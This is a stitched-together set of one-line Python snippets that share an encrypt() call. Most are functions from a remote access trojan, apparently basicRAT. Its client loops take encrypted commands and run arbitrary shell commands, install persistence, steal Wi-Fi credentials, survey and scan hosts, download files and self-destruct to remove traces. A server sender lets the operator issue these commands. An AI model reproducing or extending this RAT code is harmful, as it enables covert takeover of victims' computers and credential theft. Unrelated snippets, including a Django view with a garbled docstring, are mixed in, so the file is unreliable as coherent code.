def main(): # prep data to send to server data = server_to_client(CMD, ACT) data = dict2json(data) enc_data = encrypt(data, KEY) # data sent to client dec_data = decrypt(enc_data, KEY) dec_data = json2dict(dec_data) dec_cmd, dec_act = dec_data['command'], dec_data['action'] # things are working so far :) if (CMD == dec_cmd) and (ACT == dec_act): print('working!') results = os.popen('%s %s' % (CMD, ACT)).read() # prep data to send to client data = client_to_server(results) data = dict2json(data) enc_data = encrypt(data, KEY) # data sent to server dec_data = decrypt(enc_data, KEY) dec_data = json2dict(dec_data) dec_results = dec_data['results'] print(dec_results)
def client_loop(conn, dhkey): while True: results = '' # wait to receive data from server data = crypto.decrypt(conn.recv(4096), dhkey) # seperate data into command and action cmd, _, action = data.partition(' ') if cmd == 'kill': conn.close() return 1 elif cmd == 'selfdestruct': conn.close() toolkit.selfdestruct(PLAT) elif cmd == 'goodbye': conn.shutdown(socket.SHUT_RDWR) conn.close() break elif cmd == 'rekey': dhkey = crypto.diffiehellman(conn) elif cmd == 'persistence': results = persistence.run(PLAT) elif cmd == 'scan': results = scan.single_host(action) elif cmd == 'survey': results = survey.run(PLAT) elif cmd == 'cat': results = toolkit.cat(action, PLAT) elif cmd == 'execute': results = toolkit.execute(action) elif cmd == 'stealwifi': results = toolkit.stealwifi(PLAT) elif cmd == 'ls': results = toolkit.ls(action, PLAT) elif cmd == 'pwd': results = toolkit.pwd(PLAT) elif cmd == 'unzip': results = toolkit.unzip(action) elif cmd == 'wget': results = toolkit.wget(action) results += '\n{} completed.'.format(cmd) conn.send(crypto.encrypt(results, dhkey))
def write(self, device: Device, message: dict): try: if device.key: message = json.dumps(message, cls=MessageEncoder).encode() message = encrypt(message, device.key) super().write(device, message) except (json.JSONDecodeError, InvalidToken): self.encryption_error.emit(Device, message)
def send_client(self, cmd, action, client): try: data = server_to_client(cmd, action) data = dict2json(data) enc_data = encrypt(data, client.dhkey) client.conn.send(enc_data) except Exception as e: print('Error: {}'.format(e))
def send(self, prompt): if not self.alive: print 'Error: Client not connected.' return # check for old output readable, _, _ = select.select([self.conn], [], [], 0) if readable: print self.old_output(0) # seperate prompt into command and action cmd, _, action = prompt.partition(' ') # selfdestruct rat if cmd == 'selfdestruct': if raw_input('Remove all traces of basicRAT from the target ' \ 'system (y/N)? ').startswith('y'): print 'Running selfdestruct...' self.conn.send(encrypt(prompt, self.dhkey)) self.conn.close() return # send prompt to client try: self.conn.send(encrypt(prompt, self.dhkey)) except socket.error: print 'Error: Could not connect to client.' return self.conn.settimeout(1) # kill client connection if cmd == 'kill': self.conn.close() if cmd == 'rekey': self.dhkey = diffiehellman(self.conn) # results of execute, persistence, scan, survey, unzip, wget, or stealwifi if cmd in [ 'cat', 'execute', 'ls', 'persistence', 'pwd', 'rekey', 'scan', 'survey', 'unzip', 'wget', 'stealwifi' ]: print 'Running {}...'.format(cmd) recv_data = decrypt(self.conn.recv(4096), self.dhkey) print recv_data
def write_all(self, message: dict): message = json.dumps(message, cls=MessageEncoder).encode() for device in self.get_devices(): if device.key: try: encrypted = encrypt(message, device.key) super().write(device, encrypted) except (json.JSONDecodeError, InvalidToken): self.encryption_error.emit(device, message)
def client_loop(conn, dhkey): while True: results = '' # wait to receive data from server data = crypto.decrypt(conn.recv(4096), dhkey) # error checking here! for faulty shit (both sides of recv) data = json2dict(data) cmd, action = data['command'], data['action'] if cmd == 'kill': conn.close() return 1 elif cmd == 'selfdestruct': conn.close() toolkit.selfdestruct(PLAT) elif cmd == 'quit': conn.shutdown(socket.SHUT_RDWR) conn.close() break elif cmd == 'persistence': results = persistence.run(PLAT) elif cmd == 'scan': results = scan.single_host(action) elif cmd == 'survey': results = survey.run(PLAT) elif cmd == 'cat': results = toolkit.cat(action) elif cmd == 'execute': results = toolkit.execute(action) elif cmd == 'ls': results = toolkit.ls(action) elif cmd == 'pwd': results = toolkit.pwd() elif cmd == 'unzip': results = toolkit.unzip(action) elif cmd == 'wget': results = toolkit.wget(action) results = results.rstrip() + '\n{} completed.'.format(cmd) data = client_to_server(results) data = dict2json(data) conn.send(crypto.encrypt(data, dhkey))
def send_client(self, message, client): try: enc_message = encrypt(message, client.dhkey) client.conn.send(enc_message) except Exception as e: print 'Error: {}'.format(e)
def send_client(self, message, client): try: enc_message = encrypt(message, client.dhkey) client.conn.send(enc_message) except: print 'Error: Could not connect to client.'
def space(request, space_id='00000000-0000-0000-0000-000000000000'): """ Display a space **Context** 'space': this space 'own_spaces': list of login user's spaces 'other_spaces': list of login user's spaces witch user can see 'collaborators': list of space's users 'messages': list of space's messages 'can_add_message': rights flag 'can_create_space': rights flag 'can_edit_space': rights flag 'can_archive_space': rights flag 'can_delete_space': rights flag 'can_add_user:'******'can_edit_user_rights': rights flag **Template:** :template:`space.html` """ user = request.user space = get_object_or_404(Space, pk=space_id) if user_see_space(user, space): try: space_user = get_space_user(user, space) except SpaceUser.DoesNotExist: if space.is_embigo_space(): rights = embigo_default_rights() else: rights = user_default_rights_of_public_space() space_user = SpaceUser(uid=uuid1(), rights=rights, space=space, user=user) space_user.save() children_list = [c for c in space.children.all() if c.is_active()] user_spaces = {} for c in children_list: if user_see_child(user, space_user, c): c_user = get_space_user_or_none(user, c) user_spaces[c] = [gc for gc in c.children.all() if gc.is_active() and user_see_child(user, c_user, gc)] parent_collaborators = [] if space.parent: try: parent_user = SpaceUser.objects.get(space=space.parent, user=user) except SpaceUser.DoesNotExist: parent_user = None if parent_user and parent_user.can(SEE_USERS): parent_collaborators = SpaceUser.objects.filter(space=space.parent) parent_collaborators = [pc for pc in parent_collaborators if not user_is_space_user(pc.user, space) and space_user.can(SEE_USERS)] can_add_message = space_user.can(ADD_MESSAGE) can_create_space = space_user.can(CREATE_SPACE) can_edit_space = space_user.can(EDIT_SPACE) can_archive_space = space_user.can(ARCHIVE_SPACE) can_delete_space = space_user.can(DELETE_SPACE) can_add_user = space_user.can(ADD_USER) can_edit_user_rights = space_user.can(EDIT_RIGHTS) can_see_users = space_user.can(SEE_USERS) user_key = encrypt(SECRET_KEY_WEBSOCKET, request.session.session_key) websocket_ip = urlparse("http://" + request.META["HTTP_HOST"]).hostname websocket_server_address = 'ws://' + websocket_ip + ':' + str(WEBSOCKET_PORT) + '/'; context = { 'space': space, 'user_spaces': user_spaces, 'parent_collaborators': parent_collaborators, 'can_add_message': can_add_message, 'can_create_space': can_create_space, 'can_edit_space': can_edit_space, 'can_archive_space': can_archive_space, 'can_delete_space': can_delete_space, 'can_add_user': can_add_user, 'can_edit_user_rights': can_edit_user_rights, 'can_see_users': can_see_users, 'user_key': user_key, 'websocket_server_address': websocket_server_address } return render(request, 'space.html', context) else: return HttpResponseRedirect("/")
def send_client(self, message, client): try: enc_message = encrypt(message, client.dhkey) client.conn.send(enc_message) except Exception as e: print("[!]: {}".format(str(e)))